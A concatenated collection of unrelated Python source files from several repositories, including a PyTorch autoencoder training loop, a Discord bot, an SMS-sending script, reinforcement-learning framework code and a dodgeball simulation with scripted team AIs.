print('\t partial train loss (single batch): %f' % (loss.data))
train_loss.append(loss.detach().cpu().numpy())
return np.mean(train_loss)
### Testing function
def test_epoch(encoder, decoder, device, dataloader, loss_fn):
# Set evaluation mode for encoder and decoder
encoder.eval()
decoder.eval()
with torch.no_grad(): # No need to track the gradients
# Define the lists to store the outputs for each batch
conc_out = []
conc_label = []
for image_batch, _ in dataloader:
# Move tensor to the proper device
image_batch = image_batch.to(device)
# Encode data
encoded_data = encoder(image_batch)
# Decode data
decoded_data = decoder(encoded_data)
# Append the network output and the original image to the lists
conc_out.append(decoded_data.cpu())
conc_label.append(image_batch.cpu())
# Create a single tensor with all the values in the lists
conc_out = torch.cat(conc_out)
conc_label = torch.cat(conc_label)
# Evaluate global loss
val_loss = loss_fn(conc_out, conc_label)
return val_loss.data
def plot_ae_outputs(encoder,decoder,n=10):
plt.figure(figsize=(16,4.5))
targets = test_dataset.targets.numpy()
t_idx = {i:np.where(targets==i)[0][0] for i in range(n)}
for i in range(n):
ax = plt.subplot(2,n,i+1)
img = test_dataset[t_idx[i]][0].unsqueeze(0).to(device)
encoder.eval()
decoder.eval()
with torch.no_grad():
rec_img = decoder(encoder(img))
plt.imshow(img.cpu().squeeze().numpy(), cmap='gist_gray')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
if i == n//2:
ax.set_title('Original images')
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(rec_img.cpu().squeeze().numpy(), cmap='gist_gray')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
if i == n//2:
ax.set_title('Reconstructed images')
plt.show()
num_epochs = 30
diz_loss = {'train_loss':[],'val_loss':[]}
for epoch in range(num_epochs):
train_loss = train_epoch(encoder,decoder,device,train_loader,loss_fn,optim)
val_loss = test_epoch(encoder,decoder,device,test_loader,loss_fn)
print('\n EPOCH {}/{} \t train loss {} \t val loss {}'.format(epoch + 1, num_epochs,train_loss,val_loss))
diz_loss['train_loss'].append(train_loss)
diz_loss['val_loss'].append(val_loss)
plot_ae_outputs(encoder,decoder,n=10)
# Plot losses
plt.figure(figsize=(10,8))
plt.semilogy(diz_loss['train_loss'], label='Train')
plt.semilogy(diz_loss['val_loss'], label='Valid')
plt.xlabel('Epoch')
plt.ylabel('Average Loss')
#plt.grid()
plt.legend()
#plt.title('loss')
plt.show()
```
|
{
"source": "jedipunkz/discord-bot-division2",
"score": 3
}
|
#### File: jedipunkz/discord-bot-division2/discord-bot-division2-message.py
```python
import discord
import os
class Isac(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
async def on_message(self, message):
if message.author == self.user:
return
if message.content.startswith('メンテ'):
await message.channel.send(
'こちらを見てくだしあ..!!!' +
'https://twitter.com/thedivisiongame'
)
if message.content.startswith('統計'):
await message.channel.send(
'こちらを見てくだしあ ..!!!\n' +
'ユーザ名 : nakama \n' +
'パスワード : <PASSWORD> \n' +
'http://172.16.17.32:23001/d/uWfWtAmZk/division2?orgId=1&from=now%2Fd&to=now%2Fd'
)
if message.content == "眠たい" \
or message.content == "眠い" \
or message.content == "ねむい":
await message.channel.send(
f"{message.author.mention}さん、寝ましょう"
)
def main():
token = os.getenv('token')
client = Isac()
client.run(token)
if __name__ == "__main__":
main()
```
|
{
"source": "JediRhymeTrix/AssignmentSubmission",
"score": 3
}
|
#### File: AssignmentSubmission/trishul/nsm2.py
```python
import urllib.request
#import urllib2
import http.cookiejar
from getpass import getpass
import sys
def smscall(un,pwd,msg,rcnum):
#username = input("Enter Username: ")
#passwd = getpass()
#message = input("Enter Message: ")
#number = input("Enter Mobile number:")
username=un
passwd=<PASSWORD>
message=msg
number=rcnum
message = "+".join(message.split(' '))
#Logging into the SMS Site
url = 'http://site24.way2sms.com/Login1.action?'
data = 'username='+username+'&password='+passwd+'&Submit=Sign+in'
#For Cookies:
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
# Adding Header detail:
opener.addheaders = [('User-Agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')]
try:
usock = opener.open(url, data.encode())
except IOError:
print ("Error while logging in.")
sys.exit(1)
jession_id = str(cj).split('~')[1].split(' ')[0]
send_sms_url = 'http://site24.way2sms.com/smstoss.action?'
send_sms_data = 'ssaction=ss&Token='+jession_id+'&mobile='+number+'&message='+message+'&msgLen=136'
opener.addheaders = [('Referer', 'http://site25.way2sms.com/sendSMS?Token='+jession_id)]
try:
sms_sent_page = opener.open(send_sms_url,send_sms_data.encode())
except IOError:
print ("Error while sending message")
sys.exit(1)
print ("SMS has been sent.")
```
|
{
"source": "jedirv/ELF-OSU",
"score": 2
}
|
#### File: ELF-OSU/atari/model.py
```python
from rlpytorch import Model, ActorCritic
import torch
import torch.nn as nn
class Model_ActorCritic(Model):
def __init__(self, args):
super(Model_ActorCritic, self).__init__(args)
params = args.params
self.linear_dim = 1920
relu_func = lambda : nn.LeakyReLU(0.1)
# relu_func = nn.ReLU
self.trunk = nn.Sequential(
nn.Conv2d(12, 32, 5, padding = 2),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(32, 32, 5, padding = 2),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(32, 64, 3, padding = 1),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(64, 64, 3, padding = 1),
relu_func(),
nn.MaxPool2d(2, 2),
)
self.conv2fc = nn.Sequential(
nn.Linear(self.linear_dim, 512),
nn.PReLU()
)
self.policy_branch = nn.Linear(512, params["num_action"])
self.value_branch = nn.Linear(512, 1)
self.softmax = nn.Softmax()
def forward(self, x):
s = self._var(x["s"])
# print("input size = " + str(s.size()))
rep = self.trunk(s)
# print("trunk size = " + str(rep.size()))
rep = self.conv2fc(rep.view(-1, self.linear_dim))
policy = self.softmax(self.policy_branch(rep))
value = self.value_branch(rep)
return rep, dict(pi=policy, V=value)
# Format: key, [model, method]
Models = {
"actor_critic" : [Model_ActorCritic, ActorCritic]
}
```
#### File: ELF-OSU/elf_python/simulator.py
```python
from .zmq_adapter import InitSender, WaitAll, SendAll
import abc
import torch.multiprocessing as _mp
mp = _mp.get_context('spawn')
class Simulator(mp.Process):
'''
Wrapper for simulator.
Functions to override:
on_init: Initialization after the process has started.
restart: restart the environment.
terminal: property that tell whether the game has reached terminal
get_key: from the key, get the content. e.g. ``get_key("s")`` will give the encoded state of the game.
set_key: set the key from replies. e.g., ``set_key("a", 2)`` set the action to be 2 (and the underlying game can continue).
'''
def __init__(self, id, desc):
'''
Example:
desc = dict(
actor = dict(
input = dict(s="", last_terminal=""),
reply = dict(a="")
connector = "name1"
),
train = dict(
input = dict(s="", r="", a=""),
reply = None,
connector = "name2"
)
}
'''
super(Simulator, self).__init__()
self.id = id
self.agent_name = "game-" + self.id
self.desc = desc
def on_init(self):
pass
def restart(self):
pass
@abc.abstractproperty
def terminal(self):
pass
@abc.abstractmethod
def get_key(self, key):
pass
@abc.abstractmethod
def set_key(self, key, value):
pass
def run(self):
'''Return reward'''
self.chs = { }
for key, v in self.desc.items():
self.chs[key] = InitSender(v["connector"], self.id)
self.seq = 0
self.game_counter = 0
self.restart()
while True:
send_chs = {}
reply_chs = {}
reply_format = {}
data = { }
for name, v in self.desc.items():
# Collector and send data.
data_to_send = { k : self.get_key(k) for k, _ in v["input"].items() }
data_to_send.update({
"_agent_name" : self.agent_name,
"_game_counter" : self.game_counter,
"_seq" : self.seq
})
# A batch of size 1
data[name] = [ data_to_send ]
send_chs[name] = self.chs[name]
if v["reply"] is not None:
reply_chs[name] = self.chs[name]
reply_format[name] = v["reply"]
# Send all.
# print("[%s]: Before send ..." % agent_name)
SendAll(send_chs, data)
# Wait for receive if there is any. Note that if there are multiple
# desc, then we need to wait simultaneously.
# print("[%s]: Before wait reply ..." % agent_name)
replies = WaitAll(reply_chs)
# Set all the keys.
for name, reply in replies.items():
# Note that each reply is also a batch of size 1
for k, v in reply[0].items():
if k in reply_format[name]:
self.set_key(k, v)
if self.terminal:
self.seq = 0
self.game_counter += 1
self.restart()
else:
self.seq += 1
```
#### File: ELF-OSU/rlpytorch/rlmethod_base.py
```python
import abc
from collections import defaultdict
from .utils import Stats
from .args_utils import ArgsProvider
class LearningMethod:
def __init__(self, mi=None, args=None):
'''Initialize a learning method. ``args`` encodes the hyperparameters that the learning method reads from the command line. For example
::
args = [
("T", 6),
("use_gradient_clip", dict(action="store_true"))
]
means that
* there is an argument ``T`` whose default value is ``6`` (int).
* there is a binary switch ``use_gradient_clip``.
When the second element of an entry in ``args`` is a dict, it will be used as the specification of ``ArgumentParser`` defined in :mod:`argparse`.
Once the arguments are loaded, they are accessible as attributes in ``self.args``. The class also call :func:`_init` so that the derived class
has a chance to initialize relevant variables.
Arguments:
mi (ModelInterface): The model to be updated using input batches.
args (list): The arguments used by the learning method.
If None (which is often the case), then :class:`LearningMethod`, as a base class, will automatically
call ``_args()`` of the derived class to get the arguments.
'''
if args is None:
self.args = ArgsProvider(
call_from = self,
define_args = self._args(),
on_get_args = self._init
)
else:
self.args = args
self._init(args)
# Accumulated errors.
self.stats = defaultdict(lambda : Stats())
self._cb = {}
if mi is not None:
self.model_interface = mi
def set_model_interface(self, mi):
'''Set the model to be updated. '''
self.model_interface = mi
def _args(self):
'''Return the arguments that the learning method will read from the command line'''
return []
@abc.abstractmethod
def _init(self, args):
'''The function is called when the learning method gets the arguments from the command line. Derived class overrides this function.
Arguments:
args(ArgsProvider): The arguments that have been read from the command line.
'''
pass
@abc.abstractmethod
def update(self, batch):
'''Compute the gradient of the model using ``batch``, and accumulate relevant statistics.
Note that all the arguments from command line are accessible as attributes in ``self.args``.
'''
pass
def add_cb(self, name, cb):
self.cb[name] = cb
def run(self, batch, update_params=True):
'''The method does the following
* Zero the gradient of the model.
* Compute the gradient with ``batch`` and accumulate statistics (call :func:`update`).
* If ``update_params == True``, update the parameters of the model.
'''
self.model_interface.zero_grad()
self.update(batch)
# If update_params is False, we only compute the gradient, but not update the parameters.
if update_params:
self.model_interface.update_weights()
def print_stats(self, global_counter=None, reset=True):
for k in sorted(self.stats.keys()):
v = self.stats[k]
print(v.summary(info=str(global_counter) + ":" + k))
if reset: v.reset()
# Some utility functions
def average_norm_clip(grad, clip_val):
''' The first dimension will be batchsize '''
batchsize = grad.size(0)
avg_l2_norm = 0.0
for i in range(batchsize):
avg_l2_norm += grad[i].data.norm()
avg_l2_norm /= batchsize
if avg_l2_norm > clip_val:
# print("l2_norm: %.5f clipped to %.5f" % (avg_l2_norm, clip_val))
grad *= clip_val / avg_l2_norm
def accumulate(acc, new):
ret = { k: new[k] if a is None else a + new[k] for k, a in acc.items() if k in new }
ret.update({ k : v for k, v in new.items() if not (k in acc) })
return ret
def check_terminals(has_terminal, batch):
# Block backpropagation if we go pass a terminal node.
for i, terminal in enumerate(batch["terminal"]):
if terminal: has_terminal[i] = True
def check_terminals_anyT(has_terminal, batch, T):
for t in range(T):
check_terminals(has_terminal, batch[t])
```
|
{
"source": "jedis00/foggycam",
"score": 3
}
|
#### File: foggycam/src/azurestorageprovider.py
```python
from azure.storage.blob import BlockBlobService, ContentSettings
class AzureStorageProvider(object):
"""Class that facilitates connection to Azure Storage."""
def upload_video(self, account_name='', sas_token='', container='', blob='', path=''):
"""Upload video to the provided account."""
block_blob_service = None
if account_name and sas_token and container and blob:
block_blob_service = BlockBlobService(account_name=account_name, sas_token=sas_token)
containers = block_blob_service.list_containers()
print ("Available containers:")
for container_entry in containers:
print (container_entry.name)
container_matches = any(x for x in containers if x.name == container)
if not container_matches:
block_blob_service.create_container(container)
else:
print ('ERROR: No account credentials for Azure Storage specified.')
block_blob_service.create_blob_from_path(
container,
blob,
path,
content_settings=ContentSettings(content_type='video/mp4')
)
```
|
{
"source": "jedisct1/jumpinjack",
"score": 3
}
|
#### File: jedisct1/jumpinjack/jumpinjack.py
```python
import getopt
import sys
import re
file, line_nb = None, 0
affected_files = {}
def tag_file(affected_file, affected_lines):
with open(affected_file) as f:
tagged_file = affected_file + ".tagged"
with open(tagged_file, "w") as h:
line_nb = 0
for line in f:
line_nb = line_nb + 1
if line_nb in affected_lines:
detail = affected_lines[line_nb]
if re.match(".*(for|while|do|if|else|assert|break|continue|switch|return|\}).*", line):
line = line.rstrip() + "\t/*** JJ: JUMP (" + detail + ") ***/\n"
else:
line = line.rstrip() + "\t/*** JJ: JUMP! (" + detail + ") ***/\n"
h.write(line)
print(tagged_file)
def tag(base_dir, dump_file):
file, line_nb = None, 0
for line in open(dump_file):
if re.match("^/.+[.].+:[0-9]+$", line):
file_, line_nb_ = line.strip().split(':')
if file_.startswith(base_dir):
file, line_nb = file_, int(line_nb_)
else:
file, line_nb = None, 0
continue
if not file:
continue
parts = line.strip().split("\t")
if len(parts) < 3:
continue
opcode = parts[2].split(' ')[0]
if not re.match("^(ja|jae|jb|jbe|jc|jcxz|je|jecxz|jg|jge|jl|jle|jna|jnae|" +
"jnb|jnbe|jnc|jne|jng|jnge|jnl|jnle|jno|jnp|jns|jnz|jo|" +
"jp|jpe|jpo|js|jz)$", opcode):
continue
if file not in affected_files:
affected_files[file] = {}
affected_files[file][line_nb] = re.sub("\s+", " ", parts[2])
for affected_file in affected_files:
try:
tag_file(affected_file, affected_files[affected_file])
except IOError:
pass
def usage():
print("Usage: jumpinjack.py -b <base dir> -d <objdump file>")
sys.exit(2)
try:
opts, args = getopt.getopt(sys.argv[1:], "b:d:")
except getopt.GetoptError as err:
usage()
base_dir, dump_file = None, None
for o, a in opts:
if o == "-b":
base_dir = a
elif o == "-d":
dump_file = a
if (not base_dir) or (not dump_file):
usage()
tag(base_dir, dump_file)
```
|
{
"source": "jedislight/Shockball",
"score": 3
}
|
#### File: Shockball/Frameworks/CommonQueryAIFramework.py
```python
import math
import vector
from AI import AI
class CommonQueryAIFramework(AI):
def __init__(self):
pass
def GetClosestObject(self, origin, objects):
result = None
if objects:
distances = [(origin - obj.position).length for obj in objects]
result = objects[distances.index(min(distances))]
return result
def GetClosest(self, origin, positions):
result = None
if positions:
distances = [(origin - position).length for position in positions]
result = positions[distances.index(min(distances))]
return result
def GetClosestAttackableOpponent(self, player, ai_input):
target = self.GetClosestObject(player.position, [target for target in ai_input.player_infos if target.team != player.team and target.has_been_hit != True])
return target
def GetClosestInFlightThrownBall(self, player, ai_input):
avoid = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw])
return avoid
def GetClosestTeamateWithoutBall(self, player, ai_input):
return self.GetClosestObject(player.position, [player for player in ai_input.player_infos if player.team == ai_input.team and player.has_ball == False])
def GetPlayerNumbered(self, number, ai_input):
for player in ai_input.player_infos:
if player.number == number:
return player
return None
def GetHitTeammates(self, ai_input):
return [player for player in ai_input.player_infos if player.team == ai_input.team and player.has_been_hit]
def GetOpponents(self, ai_input):
return [player for player in ai_input.player_infos if player.team != ai_input.team]
def Distance(self, a, b):
if type(a) == vector.Vector:
return (a-b).length
return (a.position - b.position).length
def GetTeammates(self, ai_input):
return [player for player in ai_input.player_infos if player.team == ai_input.team]
def IsBallGoingToward(self, ball, position):
if ball:
ball_to_object = position - ball.position
ball_to_object.normalize()
ball_velocity_normalized = vector.Vector(ball.velocity.x, ball.velocity.y)
ball_velocity_normalized.normalize()
angel_of_approach = ball_to_object * ball_velocity_normalized
if angel_of_approach > .5:
return True
return False
```
#### File: Shockball/Frameworks/EasyStatsFramework.py
```python
from AI import AI
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
class EasyStatsFramework(AI):
def __init__(self):
self.stats = [PlayerStatsPrebuilts.balanced, PlayerStatsPrebuilts.balanced, PlayerStatsPrebuilts.balanced]
def GetPlayerStats(self, player_number):
return self.stats[player_number - 1]
```
#### File: jedislight/Shockball/Simulation.py
```python
import vector
import random
import math
from AI import *
class LeTiredPlayer(object):
def __init__(self, position_x, position_y, team):
self.position = vector.Vector(position_x, position_y)
self.team = team
def Update(self):
pass
class Player(object):
def __init__(self, number):
self.number = number
self.position = vector.Vector()
self.run = 2
self.pick = 2
self.throw = 2
self.stamina = 2
self.team = 0
self.has_ball = False
self.update_per_tired_max = 200
self.updates_till_tired = random.randint(self.update_per_tired_max * 0.8, self.update_per_tired_max)
self.has_been_hit = False
self.move_target = self.position
def SetStats(self, stats):
assert stats.AreValid()
self.run = stats.run
self.pick = stats.pick
self.throw = stats.throw
self.stamina = stats.stamina * 2 - 1
def Update(self, player_update_instructions):
self.updates_till_tired -= 1
self.move_target = self.position
#le tired
if self.updates_till_tired <= 0:
self.updates_till_tired = self.update_per_tired_max
self.TakeDamage()
#move
if self.has_been_hit and self.run != 0:
if self.team == 0:
direction = vector.Vector(0,-1)
else:
direction = vector.Vector(0,1)
velocity = direction * math.sqrt(self.run)
self.position = self.position + velocity
if (self.team == 0 and self.position.y <= 0) or (self.team == 1 and self.position.y >= Simulation.arena_size):
self.has_been_hit = False
elif player_update_instructions.is_moving == True and self.run != 0:
self.move_target= player_update_instructions.move_target
distance = (player_update_instructions.move_target - self.position).length
velocity = min(math.sqrt(self.run), distance)
impulse = self.move_target - self.position
impulse.normalize()
impulse = impulse * velocity
self.position = self.position + impulse
self.position.x = max(0.0, self.position.x)
self.position.x = min(Simulation.arena_size, self.position.x)
self.position.y = max(0.0, self.position.y)
self.position.y = min(Simulation.arena_size, self.position.y)
def TakeDamage(self):
if self.stamina > 0:
self.stamina -= 1
return
stat_choice = random.randint(0, 2)
if stat_choice == 0:
self.run -= 1
return
elif stat_choice == 1:
self.pick -= 1
return
elif stat_choice == 2:
self.throw -= 1
return
class GroundedBall(object):
def __init__(self, position_x, position_y):
self.position = vector.Vector(position_x, position_y)
def Update(object):
pass
class InFlightBall(object):
def __init__(self, target_x , target_y, position_x, position_y, thrower, is_throw, power=1.0):
power = min(power, 1.0)
power = max(power, 0.0)
self.position = vector.Vector(position_x, position_y)
self.previous_position = self.position
self.target = vector.Vector(target_x, target_y)
self.velocity = (self.target - self.position).normalize() * thrower.throw * 2 * power
self.updates_left = 5
self.thrower = thrower
self.is_throw = is_throw
def Update(self):
#move
self.previous_position = vector.Vector(self.position.x, self.position.y)
self.updates_left -= 1
self.position = self.position + self.velocity
if self.updates_left <= 0:
self.velocity = vector.Vector()
self.position.x = max(0, self.position.x)
self.position.x = min(Simulation.arena_size, self.position.x)
self.position.y = max(0, self.position.y)
self.position.y = min(Simulation.arena_size, self.position.y)
if self.position.x in (0.0, Simulation.arena_size) or self.position.y in (0.0, Simulation.arena_size):
#reflect
n = vector.Vector()
if self.position.x == 0.0:
n = n + vector.Vector(1,0)
if self.position.x == Simulation.arena_size:
n = n + vector.Vector(-1, 0)
if self.position.y == 0.0:
n = n + vector.Vector(0,-1)
if self.position.y == Simulation.arena_size:
n = n + vector.Vector(0, 1)
n.normalize()
self.velocity = self.velocity - n * ((self.velocity * n) * 2)
class Simulation(object):
arena_size = 100
def __init__(self, team_0_ai, team_1_ai):
self.update_count = 0
self.winning_team_won_on_update = -1
#ai store
self.ai = [team_0_ai, team_1_ai]
#set final state
self.winning_team = -1
#set teams
self.players = [Player(1),Player(2),Player(3),Player(4),Player(5),Player(6)]#6
self.players[0].team = 0
self.players[1].team = 0
self.players[2].team = 0
self.players[3].team = 1
self.players[4].team = 1
self.players[5].team = 1
#setup stats
self.players[0].SetStats(team_0_ai.GetPlayerStats(1))
self.players[1].SetStats(team_0_ai.GetPlayerStats(2))
self.players[2].SetStats(team_0_ai.GetPlayerStats(3))
self.players[3].SetStats(team_1_ai.GetPlayerStats(1))
self.players[4].SetStats(team_1_ai.GetPlayerStats(2))
self.players[5].SetStats(team_1_ai.GetPlayerStats(3))
#set positions
self.players[0].position = vector.Vector(.25*self.arena_size, 0)
self.players[1].position = vector.Vector(.50*self.arena_size, 0)
self.players[2].position = vector.Vector(.75*self.arena_size, 0)
self.players[3].position = vector.Vector(.25*self.arena_size, self.arena_size)
self.players[4].position = vector.Vector(.50*self.arena_size, self.arena_size)
self.players[5].position = vector.Vector(.75*self.arena_size, self.arena_size)
#set balls
self.grounded_balls = [
GroundedBall(.50*self.arena_size, .10*self.arena_size),
GroundedBall(.25*self.arena_size, .50*self.arena_size),
GroundedBall(.50*self.arena_size, .50*self.arena_size),
GroundedBall(.75*self.arena_size, .50*self.arena_size),
GroundedBall(.50*self.arena_size, .90*self.arena_size)
]
#setup inflight balls
self.in_flight_balls = []
#setup le tired players
self.le_tired_players = []
def Update(self):
self.update_count += 1
#update everything
for updateable in self.grounded_balls + self.in_flight_balls:
updateable.Update()
players_instructions = dict()
for player in self.players:
players_instructions[player] = PlayerUpdateInstructions(player.number)
#do AI here
for team in [0,1]:
ai_input = AIInput(self, team)
ai_output = self.ai[team].Update(ai_input)
for player_update_instruction in ai_output.player_update_instructions:
for player in self.players:
if player.number == player_update_instruction.number and player.team == team:
players_instructions[player] = player_update_instruction
for player in self.players:
player.Update(players_instructions[player])
#pick
for player in self.players:
if players_instructions[player].is_picking and player.has_been_hit == False:
if len(self.grounded_balls) > 0:
nearest_ball = None
nearest_distance = self.arena_size * 10
for grounded_ball in self.grounded_balls:
distance_to_player_for_current_grounded_ball = (player.position - grounded_ball.position).length
if distance_to_player_for_current_grounded_ball < nearest_distance:
nearest_distance = distance_to_player_for_current_grounded_ball
nearest_ball = grounded_ball
if nearest_distance <= 2.0:
#close enough to pick yay!
if random.randint(1,20) <= player.pick ** player.pick:
#success
player.has_ball = True
self.grounded_balls.remove(nearest_ball)
#pass/throw
for player in self.players:
if player.has_ball == False:
continue
instructions = players_instructions[player]
if instructions.is_throwing or instructions.is_passing:
target = instructions.throw_target
power = instructions.throw_power
if instructions.is_passing:
target = instructions.pass_target
power = instructions.pass_power
player.has_ball = False
ball = InFlightBall(target.x, target.y, player.position.x,
player.position.y, player, instructions.is_throwing, power)
self.in_flight_balls.append(ball)
#ball grounding
for ball in self.in_flight_balls[:]:
if ball.updates_left <= 0:
self.in_flight_balls.remove(ball)
self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
#collision!
for ball in self.in_flight_balls[:]:
nearest_player = None
nearest_distance = self.arena_size * 10 # really big
for player in self.players:
if ball.thrower != player:
distance = Simulation.DistanceToLineSegment(ball.position, ball.previous_position, player.position)
if distance < nearest_distance:
nearest_player = player
nearest_distance = distance
player = nearest_player
if player != None and nearest_distance <= 2:
#collision!
if player.has_been_hit or player.has_ball:
self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
elif ball.is_throw:
player.TakeDamage()
player.has_been_hit = True
self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
else:
player.has_ball = True
self.in_flight_balls.remove(ball)
#player elimination
for player in self.players[:]:
if player.run <=0 or player.pick <=0 or player.throw <= 0:
self.players.remove(player)
self.le_tired_players.append(LeTiredPlayer(player.position.x, player.position.y, player.team))
#check for winner!
if self.winning_team == -1:
if len(self.players) == 0:
self.winning_team = 2
else:
team = self.players[0].team
is_going_still = False
for player in self.players:
if player.team != team:
is_going_still = True
if not is_going_still:
self.winning_team_won_on_update = self.update_count
self.winning_team = team
@classmethod
def DistanceToLineSegment(cls, v, w, p):
l2 = (v-w).length
l2 = l2** 2
if l2 == 0.0:
return (p - v).length
t = ( (p-v) * (w-v) ) / l2
if t < 0.0:
return (p-v).length
elif t > 1.0:
return (p-w).length
projection = v + (w-v) * t
return (p-projection).length
```
#### File: Shockball/Team/Basic.py
```python
from AI import AI
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
import vector
@AI.Team
class Basic(ActionAIFramework, EasyStatsFramework, CommonQueryAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
EasyStatsFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
logic = [self.Action_GetClosestBall, self.Action_AttackClosestOpponent]
self.actions[1] = logic
self.actions[2] = logic
self.actions[3] = logic
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
blocker = self.GetClosestObject(player.position, [p for p in ai_input.player_infos if p.number != player.number])
if blocker and blocker.team == player.team and target:
#just move
instructions.move_target = target.position
return True
elif player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
```
#### File: Shockball/Team/Blitzy.py
```python
from AI import AI
from AI import PlayerUpdateInstructions
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
import vector
@AI.Team
class Blitzy(ActionAIFramework, EasyStatsFramework, CommonQueryAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
EasyStatsFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
self.player_starting_positions = {}
self.strategy = [ self.Action_AvoidIncomingBall
, self.Action_AttackClosestOpponent
, self.Action_CatchIncomingPass
, self.Action_GetClosestBall
, self.Action_PassBack
, self.Action_ReturnToStart
]
self.actions[1] = self.strategy
self.actions[2] = self.strategy
self.actions[3] = self.strategy
self.stats = [ PlayerStatsPrebuilts.blitzer, PlayerStatsPrebuilts.blitzer, PlayerStatsPrebuilts.blitzer ]
def Update(self, ai_input):
self.SetupStartingPositionsOnFirstUpdate(ai_input)
return ActionAIFramework.Update(self, ai_input)
def SetupStartingPositionsOnFirstUpdate(self, ai_input):
if len(self.player_starting_positions) == 0:
for player in ai_input.player_infos:
self.player_starting_positions[player.number] = player.position
def Action_AvoidIncomingBall(self, player, instructions, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = player.position - ball.position
distance = ball_to_player.length
if distance < 40 and self.IsBallGoingToward(ball, player.position):
instructions.move_target = player.position + ball_to_player
return True
return False
def Action_PassBack(self, player, instructions, ai_input):
if player.has_ball:
instructions.is_passing = True
instructions.pass_target = self.player_starting_positions[player.number]
instructions.move_target = self.player_starting_positions[player.number]
return True
return False
def Action_CatchIncomingPass(self, player, instructions, ai_input):
if ai_input.in_flight_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
if ball:
distance = (ball.position - player.position).length
ball_to_player = player.position - ball.position
angel_of_approach = ball_to_player * ball.velocity
if distance < 20.0 and angel_of_approach > .5:
ai_input.in_flight_ball_infos.remove(ball)
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
#attack
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
ai_input.player_infos.remove(target)
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
ai_input.grounded_ball_infos.remove(ball)
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_ChargeForward(self, player, instructions, ai_input):
instructions.move_target = vector.Vector(player.position.x)
instructions.move_target.y = ai_input.arena_size - self.player_starting_positions[player.number].y
return True
def Action_ReturnToStart(self, player, instructions, ai_input):
instructions.move_target = self.player_starting_positions[player.number]
return True
```
#### File: Shockball/Team/Ditto.py
```python
from AI import AI
@AI.Team
class Ditto(AI):
def __init__(self):
try:
self.other = [team for team in AI.team if team != self.__class__][0]()
except:
self.other = None
def Update(self, ai_input):
if self.other:
return self.other.Update(ai_input)
return AI.Update(self, ai_input)
def GetPlayerStats(self, player_number):
if self.other:
return self.other.GetPlayerStats(player_number)
return AI.GetPlayerStats(self, player_number)
```
#### File: Shockball/Team/Fortress.py
```python
import math
from AI import AI
import vector
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
@AI.Team
class Fortress(EasyStatsFramework, ActionAIFramework, CommonQueryAIFramework):
def __init__(self):
EasyStatsFramework.__init__(self)
ActionAIFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
self.stats = [PlayerStatsPrebuilts.catapault, PlayerStatsPrebuilts.dervish, PlayerStatsPrebuilts.catapault]
self.mode_fetcher = [self.Action_Dodge, self.Action_GetFieldBall, self.Action_PassBallToTeammate, self.Action_StoreBallAtBase, self.Action_GetClosestBall, self.Action_CircleStart]
self.mode_turret = [self.Action_Dodge, self.Action_CatchPass, self.Action_ThrowAtNearbyOpponent, self.Action_CircleStart]
self.mode_solo = [self.Action_Dodge, self.Action_GetClosestBall, self.Action_AttackClosestOpponent]
self.actions[1] = self.mode_turret
self.actions[2] = self.mode_fetcher
self.actions[3] = self.mode_turret
self.base_field_percent = 0.1
self.updates = 0
self.player_starting_positions = {}
def Update(self, ai_input):
self.updates += 1
self.SetupStartingPositionsOnFirstUpdate(ai_input)
my_team_numbers = [player.number if player.number <= 3 else player.number -3 for player in ai_input.player_infos if ai_input.team == player.team]
